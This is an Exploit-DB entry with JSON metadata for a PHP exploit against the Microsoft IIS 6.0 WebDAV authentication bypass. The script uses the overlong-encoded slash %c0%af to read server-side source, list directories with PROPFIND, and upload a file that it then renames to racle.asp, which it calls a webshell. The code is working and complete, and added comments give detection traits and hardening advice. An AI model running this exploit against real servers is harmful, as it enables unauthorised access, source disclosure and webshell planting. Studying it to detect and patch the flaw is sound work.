ID EDB-ID:8765
Type exploitdb
Reporter racle
Modified 2009-05-22T00:00:00
Description
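Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php). Remote exploit for the Windows platform. Every request in the listing below carries the overlong-encoded slash `%c0%af` in its path, so that sequence in a request URI, seen with a WebDAV verb (PROPFIND, PUT, MOVE) or a `Translate: f` header, is the trait to search for in IIS logs.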
<?
// Command-line entry: print the usage banner, then validate the three
// arguments the script reads: $argv[1] (action), $argv[2] (host), $argv[3] (path).
// NOTE: the short open tag "<?" is only parsed when short_open_tag is enabled.
print_r('
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********
Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path www.tian6.com /secret/
Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');
// Start-up argument check (comment translated from the French original).
// The action must be exactly "source", "path" or "put"; anything else exits.
if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}
else {$action=$argv[1];}
// The host is taken as a bare name: a value containing "http://" (any case) is
// rejected. It is later used for the DNS lookup and the Host header.
if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}
else{$host=$argv[2];}
// The path must contain at least one "/"; each action branch below locates the
// last "/" in it and rewrites the path at that position.
if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}
else{$path=$argv[3];}
//sent
// Sends one raw HTTP request and collects the complete response.
//   $sock - the full request text (request line, headers, optional body).
// The target comes from the global $host; the response, status line and headers
// included, is stored in the global $html. Nothing is returned.
// The connection is plain TCP to port 80 (no TLS) and fsockopen() is called
// without a timeout argument.
// Detection note: the requests are hand-built, and none of the builders in this
// file adds a User-Agent header, so they reach the server without one.
function sent($sock)
{
global $host, $html;
// Resolve the name first, then connect to the resulting address on port 80.
$ock=fsockopen(gethostbyname($host),'80');
// A failed connection ends the whole script, not just this call.
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$sock);
// Reset the shared buffer so a second call does not append to the first reply.
$html='';
// Read until the server closes the socket; every request built in this file
// carries "Connection:close".
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
// "source" action: one GET request, whose raw response is printed.
// Detection: a request URI containing %c0%af together with a "Translate: f"
// header is the trait of this branch in IIS / proxy logs. Where WebDAV is not
// needed, disabling it removes this request path; otherwise apply the vendor's
// fix and reject non-canonical (overlong) UTF-8 sequences at a request filter.
if($action=="source"){
$position=strrpos($path,"/");
// The last "/" of the path is replaced by "%c0%af/" (length argument 1).
// %c0%af is the overlong two-byte UTF-8 encoding of "/".
$path=substr_replace($path,"%c0%af/",$position,1);
$sock="GET ".$path." HTTP/1.1\r\n";
// "Translate: f" is the WebDAV header that asks for the stored file rather than
// the output of executing it.
$sock.="Translate: f\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n\r\n";
sent($sock);
// $html holds the whole reply, including the status line and headers.
echo $html;
die;
}
// "path" action: one PROPFIND request; the <a:href> values of the reply are printed.
// Detection: PROPFIND with %c0%af in the URI, no Depth header, and a declared
// Content-Length of 0 even though an XML body follows the header block.
if($action=="path"){
$position=strrpos($path,"/");
// Length argument 0: "%c0%af" is inserted in front of the last "/", which is kept.
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PROPFIND ".$path." HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
// The header announces an empty body; the XML appended on the next line is
// therefore sent as trailing bytes after the declared end of the request.
$sock.="Content-Length: 0\r\n\r\n";
$sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';
sent($sock);
// Split the reply on the literal "<a:href>" tag and keep, from each piece, the
// text up to the next "<". The first piece is whatever precedes the first tag
// (the response headers). $resultat is appended to without being initialised.
$bur=explode("<a:href>",$html);
foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";}
echo $resultat;
die;
}
// "put" action: uploads the local file test.txt with PUT, waits two seconds,
// then sends MOVE to rename it to racle.asp in the same directory.
// The file name is hard-coded: the fourth argument shown in the usage banner
// ($argv[4]) is never read.
// Detection: a PUT of ".../test.txt" followed about two seconds later by a MOVE
// whose Destination ends in "racle.asp", both with %c0%af in the URI. A file of
// that name inside a web directory is an indicator worth searching for.
// Hardening: a WebDAV directory that allows both write and script execution is
// what turns the upload into code execution; those permissions should not be
// combined, and WebDAV should be disabled where it is not used.
if($action=="put"){
echo "Remember,keep urfile in type txt!\r\n\r\n";
// Read test.txt from the current working directory; if it cannot be opened the
// script exits silently through the else branch at the end.
$fp = fopen("test.txt", 'r');
if($fp!=false){
// $fir1 is appended to without being initialised.
while (false!==($char = fgets($fp))) {
$fir1 .= $char; # fix: hoahongtim Team: hvaonline.net
}
fclose($fp);
$position=strrpos($path,"/");
// "%c0%af" is inserted in front of the last "/" (length argument 0).
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PUT ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
$sock.="Connection:close\r\n";
// Content-Length covers the file content only; the extra "\r\n" appended after
// the body on the next line is not counted.
$sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";
$sock.="".$fir1."\r\n";
// The full request is echoed locally before it is sent.
echo $sock; sent($sock);sleep(2);
$sock="MOVE ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
// The header block of this request ends with bare "\n\n" instead of CRLF pairs.
$sock.="Destination: ".$path."racle.asp\n\n";
sent($sock);
// Neither server reply is inspected: the message below is printed whatever
// status the PUT and MOVE returned.
echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
die;}
else{die;}
}
# milw0rm.com [2009-05-22]
{"id": "EDB-ID:8765", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit php", "description": "Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php). Remote exploit for windows platform", "published": "2009-05-22T00:00:00", "modified": "2009-05-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8765/", "reporter": "racle", "references": [], "cvelist": [], "lastseen": "2016-02-01T08:07:02", "viewCount": 37, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-01T08:07:02", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T08:07:02", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/8765/", "sourceData": "<?\n\nprint_r('\n******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********\n \n Usage: php '.$argv[0].' source/path/put host path \n Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp \n Example2: php '.$argv[0].' path www.tian6.com /secret/\n Example3: php '.$argv[0].' 
put www.tian6.com /secret/ test.txt(evil code as test.txt)\n****************************************************************\n');\n\n//verification du debut\nif($argv[1]!=\"source\"&&$argv[1]!=\"path\"&&$argv[1]!=\"put\"){echo \"Choose a action,source or path or put.\";die;}\nelse {$action=$argv[1];}\n\nif(stristr($argv[2],\"http://\")){echo \"No http:// in the host!\";die;}\nelse{$host=$argv[2];}\n\nif(stristr($argv[3],\"/\")==false){echo \"Where is the / ?\";die;}\nelse{$path=$argv[3];}\n\n\n//sent\nfunction sent($sock) \n{ \nglobal $host, $html; \n$ock=fsockopen(gethostbyname($host),'80'); \nif (!$ock) { \necho 'No response from '.$host; die; \n} \nfputs($ock,$sock); \n$html=''; \nwhile (!feof($ock)) { \n$html.=fgets($ock); \n} \nfclose($ock); \n} \n\nif($action==\"source\"){\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af/\",$position,1);\n\t$sock=\"GET \".$path.\" HTTP/1.1\\r\\n\";\n $sock.=\"Translate: f\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\\r\\n\";\n\tsent($sock);\n\techo $html;\n\tdie;\n\t}\n\n\nif($action==\"path\"){\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af\",$position,0);\n\t$sock=\"PROPFIND \".$path.\" HTTP/1.1\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\";\n\t$sock.='Content-Type: text/xml; charset=\"utf-8\"'.\"\\r\\n\";\n\t$sock.=\"Content-Length: 0\\r\\n\\r\\n\";\n $sock.='<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://www.foo.bar/boxschema/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';\n sent($sock);\n\t$bur=explode(\"<a:href>\",$html);\n foreach($bur as $line){$no=strpos($line,\"<\");$resultat.=substr($line,0,$no).\"\\n\";}\n echo $resultat;\n\tdie;\n }\n\n\nif($action==\"put\"){\n\techo \"Remember,keep urfile in type txt!\\r\\n\\r\\n\";\n $fp = fopen(\"test.txt\", 'r');\n\t if($fp!=false){\n while (false!==($char = fgets($fp))) {\n 
$fir1 .= $char; # fix: hoahongtim Team: hvaonline.net\n }\n fclose($fp);\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af\",$position,0);\n $sock=\"PUT \".$path.\"test.txt HTTP/1.1\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n\t$sock.='Content-Type: text/xml; charset=\"utf-8\"'.\"\\r\\n\";\n\t$sock.=\"Connection:close\\r\\n\";\n\t$sock.=\"Content-Length: \".strlen($fir1).\"\\r\\n\\r\\n\";\n $sock.=\"\".$fir1.\"\\r\\n\";\n \techo $sock; sent($sock);sleep(2);\n\t$sock=\"MOVE \".$path.\"test.txt HTTP/1.1\\r\\n\";\n $sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\";\n\t$sock.=\"Destination: \".$path.\"racle.asp\\n\\n\";\n sent($sock);\n\techo \"Be cool,man! Webshell is http://\".$host.$path.\"racle.asp\";\n\tdie;}\n\telse{die;}\n\t}\n\n# milw0rm.com [2009-05-22]\n", "osvdbidlist": []}
{}